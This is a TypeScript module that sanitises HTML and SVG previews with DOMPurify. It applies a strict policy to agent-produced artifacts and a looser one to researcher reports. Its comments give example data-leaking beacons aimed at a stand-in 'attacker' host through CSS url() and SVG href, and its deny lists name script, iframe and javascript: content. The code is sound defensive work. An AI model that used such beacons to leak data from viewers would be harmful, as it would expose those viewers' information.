import createDOMPurify from 'dompurify';

import type { SampleTree } from '../types/artifacts';

export type SanitizePolicy = 'strict' | 'report';

interface SanitizePolicyDef {
  forbidTags: string[];
  forbidAttrs: string[];
  /** Tags on which `src` may be retained when its value matches `allowSrc`. */
  srcAllowedTags: Set<string>;
  allowSrc: RegExp;
}

// Active content that we never want, regardless of trust level. Scripts and
// inline frames are nuked by the iframe sandbox at runtime too, but stripping
// them at sanitize time is cheap defence in depth. `<meta>` is here because
// `<meta http-equiv="refresh">` navigates the sandboxed iframe even with
// sandbox="" (which only blocks scripts, not meta-refresh).
const ALWAYS_FORBIDDEN_TAGS = [
  'base',
  'button',
  'embed',
  'form',
  'iframe',
  'input',
  'meta',
  'object',
  'script',
  'select',
  'textarea',
];

const ALLOWED_INLINE_IMAGE_SRC =
  /^data:image\/(png|jpe?g|gif|webp);base64,[A-Za-z0-9+/=]+$/i;

// Reports may reference external media directly (CDN images, Google Fonts via
// CSS, mp4s on a CDN). Inline data: images we produced ourselves are also
// permitted. Anything else (javascript:, vbscript:, etc.) is stripped.
const REPORT_ALLOWED_MEDIA_SRC =
  /^(?:https?:\/\/[^\s"'<>]+|data:image\/(?:png|jpe?g|gif|webp);base64,[A-Za-z0-9+/=]+)$/i;

const SAFE_CLICKED_LINK_HREF =
  /^(?:https?:\/\/[^\s"'<>]+|mailto:[^\s"'<>]+|#[^\s"'<>]*)$/i;

const STRICT_PASSIVE_URL_ATTRS = new Set([
  'action',
  'background',
  'cite',
  'formaction',
  'poster',
  'ping',
  'srcset',
]);

const POLICIES: Record<SanitizePolicy, SanitizePolicyDef> = {
  // Default policy: agent-produced artifacts. Only inline-data-URL <img>s
  // we constructed ourselves get a `src`; everything else strips.
  strict: {
    forbidTags: [...ALWAYS_FORBIDDEN_TAGS, 'link', 'style'],
    // `style` is forbidden too — inline CSS allows `background-image:
    // url('https://attacker/log?…')` which the browser dereferences even
    // inside the sandboxed iframe, leaking data via image beacons.
    forbidAttrs: ['style'],
    srcAllowedTags: new Set(['IMG']),
    allowSrc: ALLOWED_INLINE_IMAGE_SRC,
  },
  // Report policy: researcher-produced report bundles under `reports/<sample>/`.
  // Inline <style>/`style=`, remote images and media URLs are permitted.
  // <script> and form-control tags stay forbidden; scripts can't execute
  // under the iframe's `sandbox=""` regardless. (`<link>` is stripped by
  // DOMPurify's defaults — we don't override that, so external stylesheets
  // aren't supported even though the policy doesn't list `link` explicitly.)
  //
  // Threat model: the runner that writes a report already has full internet
  // egress and can `curl` anything it can read at write time. A subresource
  // beacon (`<style>…url(https://attacker/…)</style>`, inline `style=
  // "background:url(…)"`) adds at most viewer telemetry — IP, User-Agent,
  // timing, fact-of-viewing — because sandbox="" blocks JS and Hawk auth
  // lives in localStorage/Authorization headers, not cookies. That's a
  // narrower vector than what the runner can already exfiltrate at write
  // time, so we accept it to keep styled reports working. The strict policy
  // (for agent-written artifacts) does forbid these because agents don't get
  // the same trust.
  report: {
    forbidTags: ALWAYS_FORBIDDEN_TAGS,
    forbidAttrs: ['action', 'formaction', 'ping', 'srcset'],
    srcAllowedTags: new Set(['IMG', 'VIDEO', 'AUDIO', 'SOURCE']),
    allowSrc: REPORT_ALLOWED_MEDIA_SRC,
  },
};

interface SanitizeOptions {
  policy?: SanitizePolicy;
}

function requireWindow(caller: string): Window & typeof globalThis {
  if (typeof window === 'undefined') {
    // DOMPurify needs a live DOM to parse and sanitise; there is no safe
    // string-only fallback. Tests must run in jsdom (vitest's default).
    throw new Error(`${caller} requires a DOM environment`);
  }
  return window;
}

/**
 * Returns the sanitiser policy that should apply to files in `tree`.
 * Artifact content is agent-produced and gets the strict policy; report
 * content is researcher-produced and gets the lenient policy.
 */
export function sanitizePolicyForTree(tree: SampleTree): SanitizePolicy {
  return tree === 'reports' ? 'report' : 'strict';
}

export function getSafeHtmlPreviewDocument(
  source: string,
  options: SanitizeOptions = {}
): string {
  const policy = POLICIES[options.policy ?? 'strict'];
  const preserveDocument = isFullHtmlDocument(source);

  const purify = createDOMPurify(requireWindow('getSafeHtmlPreviewDocument'));
  purify.addHook('uponSanitizeAttribute', (node, data) => {
    const attrName = data.attrName.toLowerCase();
    const value = typeof data.attrValue === 'string' ? data.attrValue : '';
    const nodeName = node.nodeName.toUpperCase();

    if (attrName === 'src') {
      data.keepAttr =
        policy.srcAllowedTags.has(nodeName) && policy.allowSrc.test(value);
      return;
    }

    if (options.policy !== 'report') {
      if (attrName === 'href') {
        data.keepAttr = nodeName === 'A' && SAFE_CLICKED_LINK_HREF.test(value);
        return;
      }

      if (attrName === 'xlink:href') {
        data.keepAttr = false;
        return;
      }

      if (STRICT_PASSIVE_URL_ATTRS.has(attrName)) {
        data.keepAttr = false;
      }
    }
  });
  return purify.sanitize(source, {
    FORBID_TAGS: policy.forbidTags,
    FORBID_ATTR: policy.forbidAttrs,
    WHOLE_DOCUMENT: preserveDocument,
  });
}

export function isFullHtmlDocument(html: string): boolean {
  return /<(?:!doctype|html|head|body)\b/i.test(html);
}

/**
 * Wraps a sanitised SVG in a minimal HTML document that's safe to render
 * inside a sandboxed iframe.
 *
 * Why this exists: rendering SVG via `<img src=presigned>` lets the browser
 * dereference `<image href="https://attacker/…">`, `<use href=…>`, and
 * `<a xlink:href=…>` beacons. Sandboxing the iframe (`sandbox=""`) blocks
 * scripts but not network requests for sub-resources, so the SVG bytes
 * themselves have to be scrubbed before display.
 *
 * Threat model mirrors `getSafeHtmlPreviewDocument`:
 * - `strict` (agent-produced artifacts): strip external href/xlink:href on
 *   SVG nodes; only intra-document fragment refs survive.
 * - `report` (researcher-produced reports): keep external refs so CDN-hosted
 *   images and SVG fragments resolve, matching the same allowance the report
 *   policy makes for `<style>` and CSS `url(...)` beacons.
 *
 * Defence in depth: the wrapper carries a strict CSP that the browser
 * enforces independently, so anything we miss in sanitisation is still
 * blocked at request time.
 */
export function sanitizeSvgDocument(
  source: string,
  options: SanitizeOptions = {}
): string {
  const policyName = options.policy ?? 'strict';
  const purify = createDOMPurify(requireWindow('sanitizeSvgDocument'));
  purify.addHook('uponSanitizeAttribute', (_node, data) => {
    if (data.attrName !== 'href' && data.attrName !== 'xlink:href') return;
    const value = typeof data.attrValue === 'string' ? data.attrValue : '';
    // Strict: only intra-document fragment refs. Report: also allow
    // http(s) so CDN-hosted images and outbound links work. Other
    // schemes (javascript:, data:, vbscript:, file:) are always
    // stripped — DOMPurify's built-in URI gating backstops this, but
    // gating explicitly here keeps the policy from depending on
    // upstream defaults.
    data.keepAttr =
      value.startsWith('#') ||
      (policyName === 'report' && /^https?:\/\//i.test(value));
  });

  const forbidTags =
    policyName === 'strict'
      ? ['foreignObject', 'script', 'style']
      : ['foreignObject', 'script'];

  const svg = purify.sanitize(source, {
    USE_PROFILES: { svg: true, svgFilters: true },
    FORBID_TAGS: forbidTags,
  });

  const imgSrc = policyName === 'report' ? 'data: https:' : 'data:';
  return (
    `<!doctype html><html><head>` +
    `<meta http-equiv="Content-Security-Policy" content="default-src 'none'; img-src ${imgSrc}; style-src 'unsafe-inline'">` +
    `<style>html,body{margin:0;height:100%;display:flex;align-items:center;justify-content:center;background:#fff}svg{max-width:100%;max-height:100%;height:auto;width:auto}</style>` +
    `</head><body>${svg}</body></html>`
  );
}
